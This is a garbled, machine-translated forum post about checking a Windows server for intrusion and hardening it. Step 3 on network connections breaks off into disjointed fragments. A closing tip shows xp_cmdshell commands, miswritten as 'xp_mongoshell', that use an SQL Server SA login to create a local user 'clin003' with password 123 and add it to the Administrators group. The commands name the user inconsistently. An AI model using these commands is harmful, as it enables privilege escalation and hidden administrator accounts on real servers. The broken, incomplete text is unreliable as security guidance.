Server Security check protection (incomplete)

Q: The server shows signs of intrusion. Ask for security settings.

. Recently, my server seems to be abnormal. I often find that some programs are opened or some errors are prompted when I log on remotely. Check that the Guest account is set to admin, another account is associated with me. this should have been infiltrated. I have closed the Guest account and have any good security settings.

 

Guest is mentioned as admin?

Obviously.

If the server is around, you can disconnect the network and perform a thorough check.

Step 1: Check the account

It is best to see if there are hidden accounts

All accounts that do not know the password and kill them

Step 2: View processes and services

If there are suspicious processes, do not turn them off first (because you don't know how to turn them off, will it be more troublesome !)

Check if there are any unknown processes in msconfig starting at startup.

Check that there are no additional service items in the system service.

It is best to use rootkit to check whether there is a hidden registry or program item, and use Rootkit Technology to hide it.

This step is just to understand the situation

Step 3: Check the network connection

Because network connection is one of the most important functions of the server and one of the directions that intruders must possess. Proposed separately

Get started

This parameter is used to modify, delete, and delete the attribute.

 

++

Note that. If you are using remote control, you must be careful. You may not be able to see it when the machine is shut down or restarted. it is not guaranteed that you can enter the system again. Khhe,

------------

I don't know about you.

Here we will talk about protection:

1: Firewall must be available. And configure appropriate rules

2: it is best to install a good anti-virus software with better active defense. (Set up a trust Program)

3: Set the permission. For example, do not allow anyone except the super administrator to delete things on the drive C. However, you can retain some accounts with the right to modify and have the right equivalent to the power user group. Hehe, You need to configure it.

I won't talk about other timely patching and upgrading the virus database. If I keep the logs, I will release an article.

..

If you have any questions, please continue the discussion.

 

 

Reprinted please indicate the source: http://blog.csdn.net/clin003

---------------------------

 

TIPS: use SQL to call methods to improve local Permissions

If you have an SQL Server administrator (SA) account and can log on, try the following method:

-- Connect to the SQL statement as an administrator and run the following command in the query Analyzer:

-- Add a user
Exec master. DBO. xp_mongoshell 'net user clin003 123/add'

-- Set to the Administrators group
Exec master. DBO. xp_mongoshell 'net localgroup administrators cli003/add'

In this way, you create an administrator user named clin003 with a password of 123 on the server. Use the user to log on to the system and change the password of your original administrator.